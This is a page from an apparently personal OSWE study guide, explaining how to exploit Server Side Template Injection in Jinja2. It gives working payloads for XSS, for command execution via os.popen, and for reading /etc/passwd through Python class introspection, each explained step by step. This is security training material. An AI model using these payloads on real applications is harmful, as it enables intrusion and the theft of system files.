💻
OSWE Everything
💻
OSWE Everything
  • VULNERABILITIES
    • Type Juggling
    • Cross Site Scripting
      • Hunting for files
    • Insecure Deserialization
      • .NET
    • SQL Injection
      • Blind SQL Injection
      • SQLi debugging
      • Code review
      • Errors and additional information
      • Approaches to leverage different databases
    • XML External Entity (XXE)
      • Types of XML Entities
      • Exploitation
      • Wrappers for errors
      • Post Exploitation
    • OS Command Injection
      • Exploitation
    • Server Side Template Injection
      • Exploitation
    • Authentication Bypass
      • Checklist
  • Unsecure Random Function
    • Exploitation
  • Cross Origin Resource Sharing (CORS)
    • Prerequisites of Exploitation
  • Client Side Request Forgery (CSRF)
    • Prerequisites of Exploitation
  • Exploit Writing
    • Cheatsheet
    • Skeleton Scripts
  • Code review
    • Manual code review
      • Routing
      • Searching for exploits
      • Debugging
    • Decompilation
      • Java
      • .NET
    • Managing the application
      • Identifying application file location
      • Restarting web applications
      • Manipulation of Assembly Attributes for Debugging (.NET)
  • Preparation Machines
    • [HTB] Vault
    • Other HTB scripts
  • ADDITIONAL INFORMATION
    • Sources
  • External Resources
    • WhiteBox Pentest
Powered by GitBook
On this page
  • Exploiting the SSTI
  • Cross Site Scripting
  • Remote Code Execution
  1. VULNERABILITIES
  2. Server Side Template Injection

Exploitation

Exploiting the SSTI

You can exploit SSTI in the following way:

Cross Site Scripting

{{ "<script>alert('XSS')</script>" }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo \"<script>alert(1)</script>\"').read() }}

Remote Code Execution

In this example we will focus on the exploiting SSTI in order to gain code execution in the Jinja2 templating engine (Python).

One of the exploits that can enable us to perform code execution can be found below:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

it looks a little bit complicated but everything should become clear after the quick explaination of the code above.

'' # creates the empty string variable
.__class__ # returns the class that the string belongs in (<class 'str'>)

Once the class is returned the payload uses MRO attribute (Method Resolution Order) which are classes that python search for base classes during method resolution (related to class inheritance).

.__mro__ # listing the classes
.__mro__[2] 
# accessing the classes that are on the top of hierarchy to find as many
# useful classes as we can
# in our case it is <class 'object'>

When we have useful class that we can take advantage of we can proceed to choosing the useful subclasses:

.__subclasses__ # shows classes that use choosen class (in our case: <class 'object'>)
.__subclasses__[40] 
# in our case it is <class 'wrapper_descriptor'> 
# which includes <type 'file'> function which can be used to read files on the system

Running the useful function which results in reading the /etc/passwd file:

('/etc/passwd').read()
PreviousServer Side Template InjectionNextAuthentication Bypass

Last updated 2 months ago